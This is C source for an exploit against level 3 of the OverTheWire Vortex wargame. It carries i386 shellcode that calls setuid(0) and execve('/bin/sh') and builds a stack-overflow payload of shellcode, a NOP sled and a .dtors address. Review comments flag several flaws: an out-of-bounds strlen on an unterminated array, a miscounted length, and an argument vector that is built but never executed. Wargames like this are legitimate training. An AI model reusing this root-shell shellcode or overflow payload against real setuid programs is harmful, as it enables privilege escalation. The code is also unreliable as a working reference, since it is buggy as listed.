/* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vortex/level03
 * by al3x - 2008.
 * Stack-based buffer overflow that overwrites the lpp pointer, which has to be in the correct range:
 * if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
 *
 * 28 **lpp = (unsigned long) &buf;
 * Writes the address of the buffer into the dtors section by using
 * 08049610 l O .data00000000 p.5841
 */
  10.  
  11. #include <unistd.h>
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15.  
#define NOP 0x90 /* x86 single-byte nop; fill value for the nops[] array in main() */
  17.  
/* 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]); */
/* i386 Linux system calls entered via int $0x80 (eax = 0x17 -> setuid,
 * eax = 0xb -> execve, as the header comment states). The literal holds
 * 31 code bytes plus the string's terminating NUL, so sizeof(shellcode) == 32
 * while strlen(shellcode) == 31 (no byte in the sequence is zero). main()
 * copies it with strlen(), i.e. 31 bytes. */
char shellcode[] =

"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80

"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
  37.  
/*
 * Builds an argument vector for the program named in argv[1]. The second
 * element is a buffer laid out as
 *   shellcode (31 bytes) | nops[] (97 bytes) | addr (4 bytes)
 * i.e. the shellcode, a run of NOP bytes, and the address 0x08049610 from
 * the file header written little-endian.
 * Returns: nothing explicit; falling off the end of main() yields 0 in C99.
 */
int main(int argc, char *argv[]) {

    /* Usage message only: there is no return/exit here, so with argc == 1
     * the code below continues with argv[1] == NULL. */
    if (argc != 2)
        printf("%s <vuln program>\n",argv[0]);

    char addr[] = "\x10\x96\x04\x08";   /* 0x08049610 little-endian; sizeof(addr) == 5 (trailing NUL) */
    char nops[97];                      /* never NUL-terminated, see the strlen() notes below */
    int i, len, ret;                    /* ret is unused in this listing */

    // 32 + 97 + 4 = 133
    /* NOTE(review): sizeof yields 32 (31 bytes + NUL), 97 and 5 here, so len
     * below is 134, not 133. "%d" with a size_t argument is also a format
     * mismatch (undefined behaviour); the matching specifier is "%zu". */
    printf("sclen = %d\n", sizeof(shellcode));
    printf("nops = %d\n",sizeof(nops));
    printf("addr = %d\n",sizeof(addr));

    len = sizeof(shellcode) + sizeof(nops) + sizeof(addr);

    char buf[len];      /* VLA; nothing below writes a terminating NUL into it */

    /* shellcode contains no zero byte, so strlen() == 31 here. */
    memcpy(buf, shellcode,strlen(shellcode));

    /* i is int while sizeof() is size_t: signed/unsigned comparison. */
    for (i = 0; i < sizeof(nops); i++)
        nops[i] = NOP;

    /* NOTE(review): nops[] holds 97 non-zero bytes and no terminator, so
     * strlen(nops) reads past the end of the array (out-of-bounds read,
     * undefined behaviour); the count the comment above intends is
     * sizeof(nops). The same strlen(nops) appears in the next memcpy. */
    memcpy(buf+strlen(shellcode),nops,strlen(nops));

    /* addr contains no zero byte, so strlen(addr) == 4. */
    memcpy(buf+(strlen(shellcode)+strlen(nops)),addr,strlen(addr));

    /* {program, payload, NULL}. Assembled but not used anywhere in this
     * listing, which ends here; note that buf is not a NUL-terminated
     * string. */
    char *nargv[] = {argv[1],buf, (char *)0};

}